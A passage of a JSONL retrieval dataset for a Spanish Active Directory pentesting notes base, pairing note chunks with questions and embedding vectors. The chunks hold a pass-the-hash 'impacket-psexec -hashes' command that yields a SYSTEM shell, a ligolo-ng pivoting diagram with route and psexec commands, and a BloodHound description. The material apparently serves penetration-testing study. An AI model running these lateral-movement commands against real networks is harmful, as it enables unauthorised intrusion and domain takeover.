-0.07064, 0.12088, 0.10468, -0.01394, -0.1645, -0.06408, 0.02186, -0.02701, -0.00758, 0.01126, -0.14562, -0.02471, 0.12774, 0.05298, -0.03859, -0.21239, -0.0209, -0.07677, 0.01757, 0.09602, -0.00481, -0.06262, -0.07578, 0.00169, -0.07124, 0.00959, 0.05377, -0.02686, 0.00182, -0.10874, 0.15, -0.01898, 0.00251, -0.02928, -0.04101, 0.01425, 0.13039, 0.07396, -0.07601, -0.10606, 0.00954, 0.00012, -0.09128, 0.19269, -0.10556, 0.05487, -0.12494, -0.0789, 0.12168, -0.12094, 0.04527, 0.05068, -0.05312, -0.04146, -0.08381, -0.10906, -0.05584, -0.03638, -0.00482, 0.05015, 0.05119, -0.13743, 0.02575, 0.08961, 0.02014, 0.03389, 0.05309, 0.02229, 0.045, -0.09377, 0.07692, 0.00928, -0.05731, 0.03781, -0.05391, 0.07762, 0.05465, 0.02729, 0.10631, -0.01643, 0.01044, 0.00101, -0.039, -0.00965, 0.05835, -0.07671, -0.03993, 0.10457, -0.06408, 0.02768, 0.03497, 0.04033, -0.02725, -0.01186, -0.02317, -0.01033, 0.06519, 0.08279, 0.0235, 0.00848, 0.05925, -0.02062, -0.01829, -0.08627, 0.02276, -0.00804, -0.01309, 0.08055, 0.00963, -0.01606, -0.04403, -0.04005, -0.03679, 0.02862, 0.0772, -0.03255, 0.00153, 0.04366, -0.06324, -0.03451, -0.00687, -0.06778, -0.00287, 0.09745, -0.01063, 0.0254, -0.03311, 0.05365, 0.06793, -0.08469, -0.08535, 0.01265, 0.02689, 0.1255, -0.02953, -0.00123, -0.00756, 0.04203, 0.02975, 0.0575, 0.00638, -0.05622, -0.03114, -0.00358, 0.03222, -0.10944, 0.00857, -0.05066, 0.01382, 0.00752, 9e-05, 0.00698, -0.09616, -0.01369, 0.04663, 0.08714, 0.02014, 0.00055, 0.03893, 0.08538, 0.03026, 0.05459, 0.03425, -0.05396, 0.03201, 0.00193, -0.02758, 0.05674, -0.03165, 0.013, -0.02243, 0.00135, -0.00494, 0.04591, 0.00729, -0.01403, 0.07031, -0.0173, 0.03029, -0.01822, -0.04837, 0.04097, 0.01613, 0.01876, -0.06745, 0.0883, 0.01773, -0.02412, -0.0265, 0.04475, 0.00317, 0.0153, 0.02345, -0.01985, 0.00961, 0.03433, 0.00109, 0.02047, 0.01663, 0.01107, 0.07448, 0.02172, -0.03131, -0.01546, 0.01826, -0.06093, 0.03785, -0.00682, -0.03527, 0.00479, -0.00366, -0.02752, 0.0201, 0.01162, -0.00712, -0.02898, -0.02674, 0.04753, 0.01238, 0.02693, 0.04956, -0.0344, -0.05218, 0.05323, -0.00665, 0.00853, -0.00861, -0.02989, 0.01054, 0.02163, -0.06088, -0.02277, -0.02941, 0.01425, -0.01796, -0.01389, -0.0108, -0.01548, -0.00805, -0.00129, -0.04437, 0.01069, 0.00812]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "cual es un programa que me permita obtener un acceso limpio en otra mΓ‘quina usando hashes NTLM?", "v": [-0.089, 0.03361, -0.09705, -0.08841, -0.03523, -0.06935, -0.17274, 0.03042, -0.24176, 0.04666, -0.09776, 0.02099, 0.07005, 0.02032, -0.01407, 0.0183, 0.04028, -0.07518, 0.06357, 0.04109, -0.05888, 0.0495, -0.17834, -0.08055, -0.06851, -0.00116, 0.07386, -0.05676, -0.16842, -0.00927, 0.01376, -0.01251, -0.00277, 0.00103, 0.06628, -0.02304, 0.04694, 0.03308, 0.06981, 0.09834, 0.12971, 0.11231, -0.1105, 0.06298, 0.16218, -0.12207, 0.0195, 0.01676, 0.04129, -0.15129, -0.00202, 0.07457, -0.11896, -0.0741, 0.0363, -0.12204, 0.11441, -0.01399, -0.05017, 0.02987, -0.03486, -0.00401, 0.03599, -0.06769, -0.06861, -0.0665, 0.07167, -0.00129, -0.05862, 0.01884, -0.11609, 0.0648, 0.09877, -0.10471, 0.04895, 0.03738, -0.05009, -0.00637, 0.10896, -0.01316, 0.02461, -0.08799, -0.01396, 0.00593, -0.11468, -0.06696, 0.10988, -0.02884, 0.0095, -0.00822, 0.00064, 0.05835, -0.01656, 0.03588, 0.12503, -0.07084, 0.09606, 0.04024, 0.03923, 0.06307, 0.11703, -0.02458, -0.10899, 0.13409, -0.09114, 0.05311, 0.07004, -0.04342, -0.06388, 0.05829, 0.06264, 0.00092, -0.05967, -0.05216, -0.06444, -0.00325, -0.01188, -0.05441, -0.05686, -0.08995, -0.05973, 0.04713, 0.00611, 0.03814, 0.08417, -0.03675, -0.00646, 0.13255, -0.12103, -0.00175, 0.08892, 0.02138, -0.0302, 0.00751, 0.0009, -0.08077, 0.01053, -0.0628, 0.00954, -0.04772, 0.08618, 0.10277, 0.00124, 0.00024, 0.02211, 0.00302, 0.00933, -0.13215, -0.02436, -0.01406, 0.04879, -0.0255, -0.00716, 0.06695, -0.04906, 0.03785, 0.00645, -0.05975, -0.14072, 0.05354, -0.06607, 0.02094, -0.03982, 0.01418, 0.0014, 0.01652, 0.02165, 0.0026, 0.05462, 0.01043, -0.02815, -0.02129, 0.00862, -0.00103, -0.00502, -0.03008, -0.00032, -0.04672, 0.01543, -0.06663, -0.03652, 0.06663, 0.02917, -0.05937, -0.02855, -0.00296, -0.05153, 0.07441, 0.00948, -0.05237, 0.03797, 0.04687, -0.03877, -0.0348, 0.04994, -0.00353, -0.0271, -0.01601, 0.08749, -0.04587, -0.07666, 0.03237, -0.03641, -0.02627, 0.05351, 0.08455, -0.03501, -0.05149, -0.02111, 0.05618, 0.04588, 0.01661, 0.04713, -0.02861, -0.05599, 0.00661, 0.00265, 0.05301, 0.01442, 0.00519, 0.00511, -0.02102, 0.04071, 0.04209, 0.01605, -0.08601, 0.04006, 0.07391, 0.04277, 0.01322, -0.05769, -0.03343, -0.02979, -0.04453, 0.02202, 0.00838, -0.04001, -0.02723, -0.03325, -0.10281, 0.0426, 0.05841, 0.01266, -0.06289, 0.00981, 0.01623, -0.05565, 0.01949, -0.04362, 0.01486, -0.03029, -0.00115, 0.01944, -0.04352, 0.01469, 0.03601]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### E) Lateral movement con Impacket (sin reverse shell nueva)\n\nUna vez tienes hash de un user privilegiado:\n\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\n\nTe da shell SYSTEM en otra mΓ‘quina, **sin necesidad de meter ninguna reverse shell**. Por encima de la red, autenticado, limpio.", "indexar": "con que puedo ejecutar comandos en otro servidor usando credenciales y evitar tener que subir cΓ³digo ejecutable?", "v": [0.03026, 0.03027, -0.2136, -0.04149, 0.03147, -0.12669, 0.09138, -0.00578, -0.05999, -0.14453, -0.23832, -0.0203, 0.041, -0.10161, 0.02937, 0.0096, 0.17681, -0.01376, 0.03295, -0.02636, 0.10396, -0.0494, 0.06774, -0.07017, -0.02282, 0.06768, -0.04149, 0.06022, -0.08026, -0.1114, -0.02633, 0.05541, 0.09072, -0.03712, 0.02646, 0.09037, -0.11088, 0.06313, -0.09932, 0.12722, -0.01974, 0.11141, -0.18088, -0.02028, -0.00681, -0.02033, 0.07159, 0.00039, 0.05414, -0.073, -0.00108, -0.04417, -0.1409, -0.12223, -0.05058, 0.01352, 0.12349, -0.11207, -0.00276, -0.01899, -0.01399, -0.09373, 0.06567, 0.01498, 0.03447, -0.00962, -0.01692, -0.07446, -0.03011, 0.05285, -0.09808, 0.08933, -0.05539, 0.05942, 0.10381, -0.051, -0.02705, -0.0796, 0.07703, 0.07371, -0.0413, -0.02254, -0.07529, 0.07147, -0.05636, -0.11835, -0.11504, -0.10182, 0.02114, 0.0031, 0.14551, 0.01203, 0.00506, 0.02627, 0.07225, 0.0414, 0.06331, 0.00509, 0.04456, 0.02106, 0.104, -0.03857, -0.02741, 0.12858, 0.09334, 0.09639, 0.07801, -0.05522, 0.07878, -0.04436, 0.02105, -0.06068, -0.05165, -0.08381, -0.08667, -0.09624, -0.05366, -0.06924, 0.02003, -0.02304, -0.10916, -0.01693, 0.00092, 0.06842, 0.00128, -0.02224, 0.01222, 0.04914, -0.01687, -0.06572, -0.10315, -0.01172, 0.04708, -0.04502, -0.03067, 0.07999, 0.0606, -0.03148, -0.08563, -0.09601, 0.06522, 0.02972, -0.00403, 0.05223, 0.07384, 0.05349, 0.00588, -0.10364, -0.0655, 0.01146, 0.10206, 0.02567, -0.09169, 0.01758, -0.06188, -0.05271, 0.03151, -0.0441, -0.03481, 0.0709, -0.00458, 0.0445, -0.00778, 0.04196, -0.00979, -0.01781, 0.00342, -0.00062, 0.04031, 0.03474, 0.00434, 0.02611, 0.0169, -0.07677, 0.0958, -0.06257, -0.06657, -0.02974, 0.00135, 0.00729, -0.00097, 0.03852, -0.00539, -0.00979, -0.01824, -0.0277, -0.01554, 0.00742, -0.02048, 0.03525, 0.01084, 0.05129, -0.01509, 0.01405, 0.02017, -0.03821, 0.06705, -0.01705, -0.07888, -0.03745, -0.0478, 0.02012, -0.00103, -0.08527, 0.04586, -0.00724, -0.03743, 0.06927, -0.02056, 0.07307, 0.00602, -0.03419, 0.09727, -0.04354, -0.04894, -0.0114, 0.03084, 0.00934, 0.0039, -0.03742, -0.00563, 0.01514, 0.06473, -0.00916, 0.03073, 0.00506, -0.03457, -0.00707, 0.04255, 0.011, -0.04625, 0.02526, 0.00704, -0.00551, 0.04135, 0.00037, 0.00561, -0.00035, -0.04174, -0.08691, 0.00017, 0.05043, -0.01561, -0.08755, -0.02949, -0.03595, -0.07478, -0.01941, -0.0239, -0.0085, 0.00542, -0.01312, 0.0199, -0.05722, -0.03624, -0.03325]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "cual es una tecnica para entrar en una red interna sin acceso directo", "v": [-0.12523, 0.04553, -0.11344, -0.03254, 0.0836, -0.11199, -0.10549, -0.04505, -0.00905, 0.0396, -0.13168, -0.11664, -0.0657, -0.09025, 0.12232, 0.0114, 0.07175, 0.00639, 0.15696, -0.08535, -0.10765, -0.01252, -0.07705, -0.02999, 0.07825, -0.03197, 0.04192, -0.00965, -0.08605, -0.09181, 0.02354, -0.04283, 0.07002, 0.00951, 0.02199, -0.08342, 0.09655, 0.12088, -0.00798, 0.10705, -0.12662, -0.03737, -0.09599, 0.02935, 0.20551, -0.06075, 0.13083, 0.04882, -0.0325, -0.04374, -0.02352, 0.05552, -0.00795, -0.1633, -0.11768, -0.16123, 0.10638, -0.07641, 0.02426, -0.07046, 0.03278, 0.05145, 0.01821, 0.04186, 0.02295, -0.09769, 0.0648, 0.02785, 0.01732, 0.01183, -0.05887, 0.00917, -0.06701, 0.02547, 0.00704, 0.04591, -0.12705, 0.05988, 0.02774, -0.04595, 0.00606, 0.0322, -0.03458, -0.00615, -0.02602, -0.1322, 0.13071, -0.03757, -0.06404, -0.11712, 0.0741, -0.07727, 0.00649, 0.00109, 0.04695, -0.03345, 0.00212, -0.03656, -0.03473, -0.08847, -0.02957, -0.01951, -0.14915, 0.05276, 0.04432, 0.06979, 0.0481, -0.10242, 0.06599, -0.02584, 0.00265, 0.04504, -0.08068, -0.02433, 0.02893, -0.00381, -0.06257, -0.01588, -0.06812, -0.05673, -0.11133, -0.07047, -0.00793, -0.05383, -0.04772, -0.02077, 0.00536, -0.04364, -0.04118, 0.04161, -0.05819, 0.04482, -0.01453, -0.09413, -0.028, -0.01575, -0.07146, -0.08104, -0.01367, -0.04112, 0.01917, 0.01645, -0.0314, -0.114, -0.03124, 0.03977, 0.02372, -0.11852, -0.05749, 0.05023, -0.03968, -0.01809, -0.05404, 0.06838, 0.01391, 0.06708, -0.00039, -0.04096, -0.03183, 0.09044, 0.00164, -0.00861, -0.03128, -0.02692, -0.11637, -0.05232, -0.07605, -0.07715, 0.05199, -0.02556, -0.01045, 0.0654, -0.0935, 0.01409, -0.04912, -0.0121, -0.0286, -0.09509, 0.04615, -0.09122, -0.00921, -0.01375, -0.02699, -0.08035, -0.0351, -0.04027, 0.00087, 0.01767, 0.02441, 0.00406, 0.01464, 0.00917, -0.03217, 0.09285, 0.01343, 0.03441, -0.04169, -0.02643, -0.04704, -0.04387, -0.04093, 0.02799, -0.01274, -0.02638, 0.06231, -0.01351, 7e-05, 0.01961, -0.05299, 0.06843, -0.01086, -0.00384, 0.07202, -0.01488, -0.06842, 0.00688, 0.06725, -0.06184, 0.01392, -0.00193, 0.09156, -0.0056, 0.08534, -0.01825, 0.03265, 0.01562, 0.0004, -0.00188, 0.00086, 0.04036, -0.03679, -0.00485, -0.00859, -0.0024, 0.04719, 0.01569, 0.02784, 0.05184, -0.03414, -0.06458, 0.0722, 0.11393, -0.00503, 0.00733, 0.0529, -0.02521, -0.14255, 0.0243, 0.02406, -0.08263, -0.02513, 0.03945, 0.05192, -0.04448, 0.04543, -0.05346]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "con que puedo tunelar el trafico de otra red a mi maquina", "v": [0.02651, -0.07952, -0.15007, -0.03879, -0.01903, 0.13213, -0.13101, 0.12152, 0.04729, 0.03672, -0.09101, -0.02376, 0.20427, 0.02247, 0.05716, 0.01218, -0.00531, -0.0383, 0.29809, -0.10371, 0.0174, -0.0966, -0.13409, -0.01607, 0.11169, -0.01524, 0.0146, -0.05857, -0.12871, -0.13044, 0.02554, -0.0047, 0.1915, -0.08099, -0.01298, -0.03768, 0.02703, 0.12288, 0.08213, -0.06281, -0.09308, -0.02731, -0.10296, -0.02761, 0.07448, -0.04821, -0.01219, -0.04493, -0.18477, -0.02099, 0.00402, -0.12937, -0.16249, -0.11286, 0.01755, -0.1068, 0.05038, -0.0106, 0.06288, 0.03442, 0.11007, -0.06109, -0.01257, 0.09663, -0.05584, -0.03696, 0.00689, 0.01176, -0.0853, 0.04806, -0.08021, 0.09028, -0.04893, 0.11118, 0.03087, -0.06466, 0.01084, -0.03756, 0.05318, 0.04543, 0.01513, 0.11478, -0.01153, 0.07591, 0.02935, -0.00126, -0.05549, -0.06893, 0.08103, 0.04868, -0.11652, -0.03297, 0.0694, 0.01784, 0.12069, 0.02295, -0.00607, 0.03011, -0.05317, -0.11842, 0.01459, 0.0498, -0.05015, 0.01614, 0.04969, 0.0722, 0.02481, -0.02224, 0.10222, 0.08233, 0.07421, 0.04203, 0.06478, -0.09494, 0.01308, -0.00828, -0.04754, -0.00615, -0.0394, -0.10951, -0.02945, 0.02425, -0.00546, -0.03355, -0.0111, -0.07291, 0.02349, 0.07456, 0.01703, 0.02168, 0.00812, 0.07043, -0.00868, -0.06095, -0.03536, 0.05539, -0.01095, -0.05187, -0.01853, 0.04412, 0.02194, -0.03068, -0.0301, -0.09945, -0.00666, 0.0572, -0.01639, -0.11118, 0.03509, -0.10988, -0.00775, -0.02434, -0.00432, -0.02976, 0.02129, 0.02515, 0.03981, 0.06344, 0.01609, 0.08609, -0.0388, 0.02135, -0.02845, -0.03158, -0.02235, 0.05469, -0.03995, -0.05032, -0.0001, -0.02125, -0.03071, -0.01417, -0.05259, 0.02552, 0.01549, -0.00811, -0.07703, -0.0519, 0.03605, -0.05025, 0.02234, -0.09082, -0.00776, 0.04253, -0.01979, -0.07227, 0.01175, -0.02561, 0.06088, 0.03439, -0.02266, -0.0303, 0.0377, -0.00742, -0.01386, 0.03408, 0.08394, -0.02093, 0.01476, -0.05585, -0.02949, 0.03508, 0.03805, -0.01433, -0.03217, 0.0323, 0.02026, -0.00241, 0.02692, 0.08058, 0.06331, 0.00946, 0.05424, -0.06269, 0.0154, 0.06157, 0.06775, 0.03062, 0.00697, -0.00253, 0.06585, 0.01814, -0.01089, 0.06702, -0.06293, -0.00924, -0.06227, 0.00955, -0.01349, 0.03002, 0.01379, 0.00579, -0.04307, -0.01168, -0.00118, -0.03934, 0.00741, 0.04193, -0.01517, -0.01891, 0.03, 0.01575, 0.01075, -0.03746, 0.00559, 0.05238, 0.00968, -0.03, -0.05773, -0.03035, -0.01568, 0.01839, -0.03919, -0.04412, 0.02607, 0.02284]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### F) Pivoting (entrar en una red interna) con ligolo-ng\n\n```\n TU KALI USUARIO1 RED INTERNA\n 10.10.10.5 10.10.10.50 192.168.5.0/24\n β”‚ β”‚ β”‚\n β”‚ ligolo proxy β”‚ β”‚\n β”‚ ───── tunel ─────► β”‚ β”‚\n β”‚ β”‚ β”‚\n β”‚ ligolo agent ─── puede llegar ──► 192.168.5.10 (DC)\n β”‚ β”‚\n β”‚ aΓ±ades ruta: β”‚\n β”‚ ip route add β”‚\n β”‚ 192.168.5.0/24 dev ligolo\n β”‚\n β”‚ ahora desde Kali:\n β”‚ impacket-psexec admin@192.168.5.10 ◄── el trΓ‘fico va por el tΓΊnel\n β–Ό\n```\n\n---", "indexar": "que herramienta sirve para ejecutar comandos remotos atraves de un proxy", "v": [0.18551, 0.0259, -0.21935, -0.16629, 0.17702, 0.00609, 0.10716, -0.00612, -0.01241, -0.0364, -0.12669, -0.04982, 0.11674, -0.06487, 0.14796, 0.05988, 0.12603, 0.03248, -0.04113, 0.02198, 0.05311, -0.06696, -0.05349, -0.0074, -0.01808, 0.02141, 0.11043, 0.02609, -0.14662, -0.0833, -0.02546, 0.04303, 0.07349, -0.04072, -0.05068, -0.04675, -0.08902, 0.07885, -0.01725, 0.12292, 0.05404, -0.00708, -0.17359, -0.01412, -0.00667, -0.05165, 0.01007, -0.01654, 0.02232, -0.02696, -0.03977, -0.17647, -0.1434, -0.01381, -0.06687, -0.08256, 0.18076, -0.12, -0.05354, -0.03385, -0.03943, -0.1154, -0.00404, 0.00489, 0.00499, -0.10792, -0.05992, -0.11268, -0.14363, 0.02231, -0.10153, 0.03604, 0.02542, 0.05057, -0.01207, -0.0497, -0.05202, -0.0176, 0.11191, -0.03896, -0.01862, -0.0344, -0.11074, -0.0185, -0.1301, -0.14252, -0.00459, -0.02734, 0.02341, -0.09827, 0.06411, 0.04475, 0.02657, 0.00925, 0.07109, 0.04515, 0.05792, -0.03274, 0.03757, -0.02832, 0.08017, -0.04294, -0.04788, 0.10767, -0.02412, 0.063, 0.00443, -0.03936, -0.00554, 0.0058, 0.07268, -0.03608, 0.05477, -0.05921, -0.00182, -0.04747, -0.06031, -0.02434, 0.04552, -0.03159, -0.06537, -0.0181, -0.04099, 0.03943, 0.0079, -0.03273, -0.10376, 0.04904, 0.04178, -0.00247, 0.00347, -0.07429, 0.01909, -0.03949, -0.04575, 0.06111, 0.04084, -0.12619, -0.06052, -0.17675, 0.04394, 0.02191, -0.00877, -0.02614, 0.07068, 0.03787, 0.0576, -0.01702, 0.00621, 0.01672, 0.01943, -0.0432, -0.04208, 0.04362, -0.06445, -0.00999, -0.07233, -0.03071, -0.04099, 0.06601, -0.01494, -0.04532, -0.01432, 0.00843, 0.02634, -0.05604, -0.01762, -0.0748, 0.08102, 0.07212, -0.0482, 0.05153, 0.0212, -0.09248, -0.04919, -0.05867, -0.03462, 0.00357, 0.02064, -0.04142, -0.04911, 0.03021, -0.03189, -0.06588, 0.05749, -0.00521, 0.01729, -0.026, 0.0007, 0.051, -0.03712, 0.03846, -0.04748, -0.03597, 0.01229, -0.01512, -0.02114, -0.03141, -0.00229, -0.05125, -0.04593, -0.00703, 0.04636, -0.06107, 0.04888, 0.05204, -0.012, 0.04207, -0.02444, 0.07225, 0.02648, -0.02353, 0.04591, 0.00463, -0.01728, -0.07678, 0.01672, -0.02173, -0.02934, 0.01652, -0.0129, 0.00718, 0.06072, -0.02182, 0.03098, 0.04146, 0.04284, 0.0007, 0.0476, -0.02449, 0.01457, -0.01088, -0.01485, -0.02173, 0.02407, -0.03293, 0.0156, -0.04865, -0.021, -0.00599, -0.05672, 0.04634, -0.00835, -0.06692, -0.02901, -0.08352, -0.07508, 0.0135, -0.01702, -0.04972, -0.03745, 0.01748, 0.05433, -0.03254, -0.01048, -0.02087]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### QuΓ© hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, mΓ‘quinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"ΒΏCuΓ‘l es el camino mΓ‘s corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **dΓ­as** de mirar listados de grupos a mano.", "indexar": "quΓ© herramienta me muestra los grΓ‘ficos de relaciones entre usuarios y mΓ‘quinas en Active Directory?", "v": [-0.01084, 0.13368, 0.01962, -0.3291, -0.08398, -0.07714, -0.11471, 0.00228, -0.023, -0.01661, 0.01673, -0.07937, -0.02616, -0.06464, 0.16279, -0.02449, 0.13292, -0.09866, -0.06333, -0.03078, 0.00496, -0.03401, -0.05581, -0.014, -0.06833, 0.09356, 0.02331, -0.10306, -0.13895, 0.09344, 0.04385, 0.00013, 0.05905, -0.05251, -0.06881, -0.12767, -0.00394, 0.02583, 0.10053, 0.00547, -0.07749, -0.09095, -0.16989, -0.03856, 0.15388, 0.06588, -0.10987, -0.04964, -0.02089, 0.09981, -0.1116, -0.15299, -0.05574, 0.05805, 0.00444, -0.19768, 0.17709, -0.02692, 0.05481, -0.09623, -0.06466, 0.00744, -0.0645, -0.00305, -0.08847, -0.01253, 0.09275, -0.09569, -0.1331, 0.0809, 0.01195, 0.02013, 0.01452, -0.00298, 0.10691, 0.04122, 0.05355, 0.06158, -0.12187, -0.02, 0.04652, -0.02069, -0.04047, 0.01149, -0.03157, -0.0764, 0.06046, -0.03148, 0.00278, -0.07754, 0.07561, 0.09345, -0.07331, -0.00408, 0.06291, 0.04032, 0.00842, -0.06323, 0.12435, -0.04039, 0.09039, -0.00239, -0.07158, 0.06644, -0.05931, 0.03657, -0.01472, 0.02104, -0.09564, 0.04949, 0.0723, -0.02093, 0.06289, -0.03875, -0.02866, 0.1021, 0.00567, -0.04311, -0.00594, -0.09421, -0.01595, 0.01195, 0.0569, 0.00294, -0.0267, -0.01693, 0.02444, 0.10811, -0.03899, -0.00172, -0.01138, 0.011, -0.06952, -0.05768, 0.0109, -0.04898, 0.02896, -0.07987, 0.00392, -0.11006, -0.01421, 0.06109, 0.00437, -0.09169, 0.04233, 0.01241, 0.04175, -0.02669, -0.01803, -0.00665, 0.02464, -0.05108, -0.01919, 0.00947, 0.0353, 0.0419, -0.04584, -0.02158, -0.07282, -0.06552, -0.01299, -0.02643, 0.01278, 0.05052, -0.01254, 0.0359, -0.06972, 0.01941, 0.03003, 0.05914, 0.04934, 0.05851, 0.04101, 0.00914, 0.03978, -0.04345, 0.00862, 0.00752, -0.01183, -0.07125, 0.0101, -0.0061, 0.02232, -0.04058, -0.0392, -0.04123, -0.0178, -0.05643, 0.05796, 0.0079, -0.01989, 0.05969, -0.00016, -0.04044, 0.08098, -0.04515, 0.02277, 0.02455, 0.00781, -0.02699, 0.02049, -0.02665, 0.01743, -0.01674, 0.04761, 0.08434, -0.00365, -0.00392, 0.01584, -0.05258, 0.02165, 0.03237, 0.00662, -0.02702, -0.05416, -0.04766, -0.00352, 0.0156, 0.00143, -0.07052, 0.02061, -0.03283, -0.01216, -0.03196, 0.02201, 0.02205, 0.01075, 0.02806, 0.02266, -0.02337, -0.00745, -0.00705, 0.02402, -0.01962, 0.00994, -0.00608, 0.04269, -0.10583, -0.01708, -0.06415, 0.03775, 0.04604, 0.02103, -0.01809, -0.08403, -0.04891, 0.01089, -0.05382, -0.04372, -0.03967, -0.0123, -0.00544, 0.05906, -0.04243, -0.04603, 0.03134]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### QuΓ© hace\n\nTe dibuja Active Directory **como un grafo**. Nodos = usuarios, grupos, mΓ‘quinas. Aristas = relaciones (member of, admin de, puede leer LAPS, etc.). Luego le preguntas:\n\n> \"ΒΏCuΓ‘l es el camino mΓ‘s corto desde **juan** hasta **Domain Admins**?\"\n\nY te lo pinta. Te ahorra **dΓ­as** de mirar listados de grupos a mano.", "indexar": "con quΓ© puedo visualizar el camino mΓ‘s corto desde un usuario hasta otro grupo sin tener que consultar listas manuales?", "v": [-0.02181, 0.11323, -0.16311, -0.03525, -0.07075, -0.17392, -0.03486, 0.02471, -0.10502, -0.21354, -0.00908, -0.06559, 0.02637, 0.04442, 0.12014, -0.0449, 0.15988, -0.01858, 0.14627, -0.04122, -0.02669, -0.09529, 0.03351, 0.03084, -0.09339, -0.08743, 0.05403, -0.08917, -0.00513, 0.0553, 0.08008, 0.06917, 0.04925, -0.12241, 0.03647, -0.04163, 0.0409, 0.08546, -0.06938, 0.01442, -0.07514, 0.0569, -0.11869, -0.00886, -0.10341, -0.10441, -0.1226, 0.03383, 0.01133, -0.02203, 0.01676, -0.04109, -0.12992, 0.00409, -0.0759, -0.10188, 0.17379, -0.03382, 0.10705, -0.15419, 0.01997, 0.01504, 0.0832, 0.0623, 0.01291, 0.00785, 0.06848, 0.04096, -0.08163, 0.01381, -0.07728, 0.00587, 0.00172, -0.0239, 0.02971, 0.01009, 0.02246, -0.00164, 0.07169, 0.07213, 0.15314, -0.03839, -0.0011, -0.07027, -0.04055, -0.10329, 0.09845, 0.01258, 0.06642, -0.122, 0.0637, 0.04616, 0.02152, 0.00402, 0.04597, 0.05826, -0.03544, 0.06711, -0.01444, 0.0026, 0.02588, -0.00454, -0.04725, 0.10678, 0.05592, 0.07766, 0.03686, -0.01961, -0.08967, 0.04723, 0.02106, -0.00065, -0.03277, -0.00821, -0.01345, 0.05154, -0.13477, -0.02894, -0.0679, -0.11205, -0.02252, -0.00407, -0.07168, 0.00424, 0.06417, -0.00689, 0.0923, 0.12792, -0.03731, -0.04643, -0.02269, 0.0702, -0.04717, -0.07134, -0.05017, -0.01072, -0.08153, 0.01665, 0.03587, 0.00302, 0.01881, -0.00581, -0.02186, -0.06855, 0.06172, -0.07162, -0.01426, -0.0778, -0.00936, 0.0654, -0.01387, -0.00704, -0.00047, 0.07425, 0.03363, 0.05698, -0.00256, -0.07674, -0.00703, 0.03439, 0.00295, 0.01847, 0.00161, -0.03716, 0.01373, 0.00062, -0.03732, -0.07286, 0.06768, 0.02606, 0.01931, 0.04923, 0.00054, -0.06481, 0.05825, -0.03206, -0.03224, 0.02479, 0.03967, 0.05932, -0.08918, 0.01038, -0.0032, -0.01388, -0.03987, -0.02783, -0.0333, 0.08724, 0.08726, 0.06216, -0.02093, 0.08666, -0.02492, -0.0467, 0.02392, -0.05769, -0.00304, -0.01759, -0.02268, -0.05662, -0.03777, -0.05279, -0.03267, 0.01342, 0.05111, -0.00903, -0.04738, 0.10639, 0.02034, 0.0784, 0.06325, -0.02483, 0.04377, -0.03373, -0.00918, -0.03575, -0.02403, -0.02964, -0.04186, 0.06808, 0.01252, 0.0797, 0.07746, -0.05687, 0.02824, 0.05683, 0.01698, -0.04527, 0.00048, 0.08728, -0.01021, 0.05252, -0.03134, -0.05196, 0.08929, 0.04025, 0.0183, 0.02998, -0.04923, 0.00237, 0.03602, 0.08252, 0.02926, -0.03354, -0.0426, -0.04287, -0.0784, 0.03239, -0.04239, -0.14039, -0.04474, 0.03114, 0.04755, -0.01249, 0.04869, -0.0468]} +{"tipo": "pregunta", "herramienta": 